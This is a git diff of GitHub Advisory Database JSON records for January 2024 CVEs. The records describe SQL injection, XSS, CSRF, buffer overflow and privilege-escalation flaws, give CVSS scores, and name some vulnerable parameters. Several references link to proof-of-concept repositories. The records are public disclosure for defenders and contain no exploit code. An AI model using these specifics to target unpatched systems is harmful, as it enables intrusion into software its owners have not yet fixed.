a/advisories/unreviewed/2024/01/GHSA-86pm-fpxw-jjjc/GHSA-86pm-fpxw-jjjc.json b/advisories/unreviewed/2024/01/GHSA-86pm-fpxw-jjjc/GHSA-86pm-fpxw-jjjc.json new file mode 100644 index 0000000000000..561f8c8bea2ae --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-86pm-fpxw-jjjc/GHSA-86pm-fpxw-jjjc.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86pm-fpxw-jjjc", + "modified": "2024-01-29T18:31:50Z", + "published": "2024-01-29T18:31:50Z", + "aliases": [ + "CVE-2023-40549" + ], + "details": "An out-of-bounds read flaw was found in Shim due to the lack of proper boundary verification during the load of a PE binary. This flaw allows an attacker to load a crafted PE binary, triggering the issue and crashing Shim, resulting in a denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40549" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-40549" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241797" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json b/advisories/unreviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json deleted file mode 100644 index 90d223cae388d..0000000000000 --- a/advisories/unreviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-86rg-pf4c-5grg", - "modified": "2024-01-04T12:30:20Z", - "published": "2024-01-04T12:30:20Z", - "aliases": [ - "CVE-2023-6944" - ], - "details": "A flaw was found in the Red Hat Developer Hub (RHDH). The catalog-import function leaks GitLab access tokens on the frontend when the base64 encoded GitLab token includes a newline at the end of the string. The sanitized error can display on the frontend, including the raw access token. Upon gaining access to this token and depending on permissions, an attacker could push malicious code to repositories, delete resources in Git, revoke or generate new keys, and sign code illegitimately.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6944" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2023-6944" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255204" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200", - "CWE-209" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-01-04T10:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-87hh-r9jv-r2jq/GHSA-87hh-r9jv-r2jq.json b/advisories/unreviewed/2024/01/GHSA-87hh-r9jv-r2jq/GHSA-87hh-r9jv-r2jq.json new file mode 100644 index 0000000000000..a82ce0b9265f6 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-87hh-r9jv-r2jq/GHSA-87hh-r9jv-r2jq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87hh-r9jv-r2jq", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-22146" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magazine3 Schema & Structured Data for WP & AMP allows Stored XSS.This issue affects Schema & Structured Data for WP & AMP: from n/a through 1.25.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22146" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/schema-and-structured-data-for-wp/wordpress-schema-structured-data-for-wp-amp-plugin-1-25-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-893r-3jv5-xxp5/GHSA-893r-3jv5-xxp5.json b/advisories/unreviewed/2024/01/GHSA-893r-3jv5-xxp5/GHSA-893r-3jv5-xxp5.json new file mode 100644 index 0000000000000..b4223beae7030 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-893r-3jv5-xxp5/GHSA-893r-3jv5-xxp5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-893r-3jv5-xxp5", + "modified": "2024-01-31T18:31:27Z", + "published": "2024-01-31T18:31:27Z", + "aliases": [ + "CVE-2024-22289" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in cybernetikz Post views Stats allows Reflected XSS.This issue affects Post views Stats: from n/a through 1.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22289" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/post-views-stats/wordpress-post-views-stats-plugin-1-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-89c9-2mcj-c9gr/GHSA-89c9-2mcj-c9gr.json b/advisories/unreviewed/2024/01/GHSA-89c9-2mcj-c9gr/GHSA-89c9-2mcj-c9gr.json new file mode 100644 index 0000000000000..ffe5295c15950 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-89c9-2mcj-c9gr/GHSA-89c9-2mcj-c9gr.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89c9-2mcj-c9gr", + "modified": "2024-02-05T18:31:36Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2024-1061" + ], + "details": "The 'HTML5 Video Player' WordPress Plugin, version < 2.5.25 is affected by an unauthenticated SQL injection vulnerability in the 'id' parameter in the  'get_view' function.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1061" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/research/tra-2024-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T09:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-89ph-wr9x-hcfc/GHSA-89ph-wr9x-hcfc.json b/advisories/unreviewed/2024/01/GHSA-89ph-wr9x-hcfc/GHSA-89ph-wr9x-hcfc.json index c674ac2e1fa45..f2559fba0e56e 100644 --- a/advisories/unreviewed/2024/01/GHSA-89ph-wr9x-hcfc/GHSA-89ph-wr9x-hcfc.json +++ b/advisories/unreviewed/2024/01/GHSA-89ph-wr9x-hcfc/GHSA-89ph-wr9x-hcfc.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31446" }, + { + "type": "WEB", + "url": "https://blog.kscsc.online/cves/202331446/md.html" + }, { "type": "WEB", "url": "https://github.com/Dodge-MPTC/CVE-2023-31446-Remote-Code-Execution" diff --git a/advisories/unreviewed/2024/01/GHSA-8c2v-657f-h9r7/GHSA-8c2v-657f-h9r7.json b/advisories/unreviewed/2024/01/GHSA-8c2v-657f-h9r7/GHSA-8c2v-657f-h9r7.json new file mode 100644 index 0000000000000..08d0449b8b9a1 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8c2v-657f-h9r7/GHSA-8c2v-657f-h9r7.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8c2v-657f-h9r7", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24139" + ], + "details": "Sourcecodester Login System with Email Verification 1.0 allows SQL Injection via the 'user' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24139" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/Login_System_with_Email_Verification_SQL_Injection/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8c82-xj9x-mxgj/GHSA-8c82-xj9x-mxgj.json b/advisories/unreviewed/2024/01/GHSA-8c82-xj9x-mxgj/GHSA-8c82-xj9x-mxgj.json index fa00f347237bd..3c28e4072d79b 100644 --- a/advisories/unreviewed/2024/01/GHSA-8c82-xj9x-mxgj/GHSA-8c82-xj9x-mxgj.json +++ b/advisories/unreviewed/2024/01/GHSA-8c82-xj9x-mxgj/GHSA-8c82-xj9x-mxgj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8c82-xj9x-mxgj", - "modified": "2024-01-23T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T09:30:22Z", "aliases": [ "CVE-2024-23850" ], "details": "In btrfs_get_root_ref in fs/btrfs/disk-io.c in the Linux kernel through 6.7.1, there can be an assertion failure and crash because a subvolume can be read out too soon after its root item is inserted upon subvolume creation.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T09:15:36Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8cww-gxv8-vfxm/GHSA-8cww-gxv8-vfxm.json b/advisories/unreviewed/2024/01/GHSA-8cww-gxv8-vfxm/GHSA-8cww-gxv8-vfxm.json index af639290142a9..7ba7b3afecad2 100644 --- a/advisories/unreviewed/2024/01/GHSA-8cww-gxv8-vfxm/GHSA-8cww-gxv8-vfxm.json +++ b/advisories/unreviewed/2024/01/GHSA-8cww-gxv8-vfxm/GHSA-8cww-gxv8-vfxm.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8cww-gxv8-vfxm", - "modified": "2024-01-25T21:32:15Z", + "modified": "2024-01-29T18:31:48Z", "published": "2024-01-25T21:32:15Z", "aliases": [ "CVE-2024-22637" ], "details": "Form Tools v3.1.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /form_builder/preview.php?form_id=2.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8g27-wpjg-5vv9/GHSA-8g27-wpjg-5vv9.json b/advisories/unreviewed/2024/01/GHSA-8g27-wpjg-5vv9/GHSA-8g27-wpjg-5vv9.json index 0526ccb65a4cb..c2243eb9e3d29 100644 --- a/advisories/unreviewed/2024/01/GHSA-8g27-wpjg-5vv9/GHSA-8g27-wpjg-5vv9.json +++ b/advisories/unreviewed/2024/01/GHSA-8g27-wpjg-5vv9/GHSA-8g27-wpjg-5vv9.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8g27-wpjg-5vv9", - "modified": "2024-01-23T03:31:08Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T03:31:08Z", "aliases": [ "CVE-2024-23217" ], "details": "A privacy issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, iOS 17.3 and iPadOS 17.3. An app may be able to bypass certain Privacy preferences.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -47,7 +50,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:11Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8g3w-rrg4-h6cj/GHSA-8g3w-rrg4-h6cj.json b/advisories/unreviewed/2024/01/GHSA-8g3w-rrg4-h6cj/GHSA-8g3w-rrg4-h6cj.json index 3d799404bc03e..1cdd9514dc903 100644 --- a/advisories/unreviewed/2024/01/GHSA-8g3w-rrg4-h6cj/GHSA-8g3w-rrg4-h6cj.json +++ b/advisories/unreviewed/2024/01/GHSA-8g3w-rrg4-h6cj/GHSA-8g3w-rrg4-h6cj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8g3w-rrg4-h6cj", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-35837" ], "details": "An issue was discovered in SolaX Pocket WiFi 3 through 3.001.02. Authentication for web interface is completed via an unauthenticated WiFi AP. The administrative password for the web interface has a default password, equal to the registration ID of the device. This same registration ID is used as the WiFi SSID name. No routine is in place to force a change to this password on first use or bring its default state to the attention of the user. Once authenticated, an attacker can reconfigure the device or upload new firmware, both of which can lead to Denial of Service, code execution, or Escalation of Privileges.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T23:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8g5q-mp2w-j766/GHSA-8g5q-mp2w-j766.json b/advisories/unreviewed/2024/01/GHSA-8g5q-mp2w-j766/GHSA-8g5q-mp2w-j766.json new file mode 100644 index 0000000000000..48371604dbbfa --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8g5q-mp2w-j766/GHSA-8g5q-mp2w-j766.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8g5q-mp2w-j766", + "modified": "2024-01-30T09:30:34Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-6943" + ], + "details": "Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to execute a malicious code by RPC with a path to a malicious library while connected to the products.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6943" + }, + { + "type": "WEB", + "url": "https://jvn.jp/vu/JVNVU95103362" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-02" + }, + { + "type": "WEB", + "url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-020_en.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-470" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T09:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8h9j-pxfp-9p97/GHSA-8h9j-pxfp-9p97.json b/advisories/unreviewed/2024/01/GHSA-8h9j-pxfp-9p97/GHSA-8h9j-pxfp-9p97.json index 8d93964d7f89e..cbe2070776259 100644 --- a/advisories/unreviewed/2024/01/GHSA-8h9j-pxfp-9p97/GHSA-8h9j-pxfp-9p97.json +++ b/advisories/unreviewed/2024/01/GHSA-8h9j-pxfp-9p97/GHSA-8h9j-pxfp-9p97.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8h9j-pxfp-9p97", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T18:31:36Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51885" ], "details": "Buffer Overflow vulnerability in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via the length of the LaTeX string component.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T17:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json b/advisories/unreviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json deleted file mode 100644 index b68addfacc078..0000000000000 --- a/advisories/unreviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-8j3x-w35r-rw4r", - "modified": "2024-01-25T21:32:14Z", - "published": "2024-01-25T21:32:14Z", - "aliases": [ - "CVE-2023-6267" - ], - "details": "A flaw was found in the json payload. If annotation based security is used to secure a REST resource, the JSON body that the resource may consume is being processed (deserialized) prior to the security constraints being evaluated and applied. This does not happen with configuration based security.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6267" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/CVE-2023-6267" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2251155" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-280" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2024-01-25T19:15:08Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8j5h-7rqc-9ghf/GHSA-8j5h-7rqc-9ghf.json b/advisories/unreviewed/2024/01/GHSA-8j5h-7rqc-9ghf/GHSA-8j5h-7rqc-9ghf.json index 2a48f83488dcb..ca3c0be3addd4 100644 --- a/advisories/unreviewed/2024/01/GHSA-8j5h-7rqc-9ghf/GHSA-8j5h-7rqc-9ghf.json +++ b/advisories/unreviewed/2024/01/GHSA-8j5h-7rqc-9ghf/GHSA-8j5h-7rqc-9ghf.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8j5h-7rqc-9ghf", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48130" ], "details": "An issue in GINZA CAFE mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:57Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8j8p-j2w4-2qvh/GHSA-8j8p-j2w4-2qvh.json b/advisories/unreviewed/2024/01/GHSA-8j8p-j2w4-2qvh/GHSA-8j8p-j2w4-2qvh.json index 059c79a0a0835..464decb5a7af2 100644 --- a/advisories/unreviewed/2024/01/GHSA-8j8p-j2w4-2qvh/GHSA-8j8p-j2w4-2qvh.json +++ b/advisories/unreviewed/2024/01/GHSA-8j8p-j2w4-2qvh/GHSA-8j8p-j2w4-2qvh.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8j8p-j2w4-2qvh", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-47192" ], "details": "An agent link vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-8jgj-565r-w957/GHSA-8jgj-565r-w957.json b/advisories/unreviewed/2024/01/GHSA-8jgj-565r-w957/GHSA-8jgj-565r-w957.json new file mode 100644 index 0000000000000..51adf66aa9958 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8jgj-565r-w957/GHSA-8jgj-565r-w957.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jgj-565r-w957", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2024-22143" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in WP Spell Check.This issue affects WP Spell Check: from n/a through 9.17.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22143" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wp-spell-check/wordpress-wp-spell-check-plugin-9-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T13:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8mj3-mj87-cf2h/GHSA-8mj3-mj87-cf2h.json b/advisories/unreviewed/2024/01/GHSA-8mj3-mj87-cf2h/GHSA-8mj3-mj87-cf2h.json index abea7bbdf23d4..af4b2367963be 100644 --- a/advisories/unreviewed/2024/01/GHSA-8mj3-mj87-cf2h/GHSA-8mj3-mj87-cf2h.json +++ b/advisories/unreviewed/2024/01/GHSA-8mj3-mj87-cf2h/GHSA-8mj3-mj87-cf2h.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-256" + "CWE-256", + "CWE-522" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-8mxm-prp8-gc3w/GHSA-8mxm-prp8-gc3w.json b/advisories/unreviewed/2024/01/GHSA-8mxm-prp8-gc3w/GHSA-8mxm-prp8-gc3w.json new file mode 100644 index 0000000000000..09ce8041cb201 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8mxm-prp8-gc3w/GHSA-8mxm-prp8-gc3w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8mxm-prp8-gc3w", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2024-24141" + ], + "details": "Sourcecodester School Task Manager App 1.0 allows SQL Injection via the 'task' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24141" + }, + { + "type": "WEB", + "url": "https://github.com/BurakSevben/School-Task-Manager-System-SQLi-1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8p2h-w6cv-wr2w/GHSA-8p2h-w6cv-wr2w.json b/advisories/unreviewed/2024/01/GHSA-8p2h-w6cv-wr2w/GHSA-8p2h-w6cv-wr2w.json new file mode 100644 index 0000000000000..5078979d6c842 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8p2h-w6cv-wr2w/GHSA-8p2h-w6cv-wr2w.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8p2h-w6cv-wr2w", + "modified": "2024-01-29T21:30:27Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-4553" + ], + "details": "Improper Input Validation vulnerability in OpenText AppBuilder on Windows, Linux allows Probe System Files.\n\n\nAppBuilder configuration files are viewable by unauthenticated users.\n\n\nThis issue affects AppBuilder: from 21.2 before 23.2.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4553" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_search&kb_category=61648712db61781068cfd6c4e296197b" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T21:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-8p37-w86w-447q/GHSA-8p37-w86w-447q.json b/advisories/unreviewed/2024/01/GHSA-8p37-w86w-447q/GHSA-8p37-w86w-447q.json index fe938aeba3fde..bde9434498b65 100644 --- a/advisories/unreviewed/2024/01/GHSA-8p37-w86w-447q/GHSA-8p37-w86w-447q.json +++ b/advisories/unreviewed/2024/01/GHSA-8p37-w86w-447q/GHSA-8p37-w86w-447q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8p37-w86w-447q", - "modified": "2024-01-23T09:30:22Z", + "modified": "2024-01-30T03:30:30Z", "published": "2024-01-23T09:30:22Z", "aliases": [ "CVE-2024-0587" @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-8p7h-9gqv-5fx9/GHSA-8p7h-9gqv-5fx9.json b/advisories/unreviewed/2024/01/GHSA-8p7h-9gqv-5fx9/GHSA-8p7h-9gqv-5fx9.json new file mode 100644 index 0000000000000..2da20d1b1d95d --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-8p7h-9gqv-5fx9/GHSA-8p7h-9gqv-5fx9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8p7h-9gqv-5fx9", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2023-6633" + ], + "details": "The Site Notes WordPress plugin through 2.0.0 does not have CSRF checks in some of its functionalities, which could allow attackers to make logged in users perform unwanted actions, such as deleting administration notes, via CSRF attacks", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6633" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/eb983d82-b894-41c5-b51f-94d4bba3ba39/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + 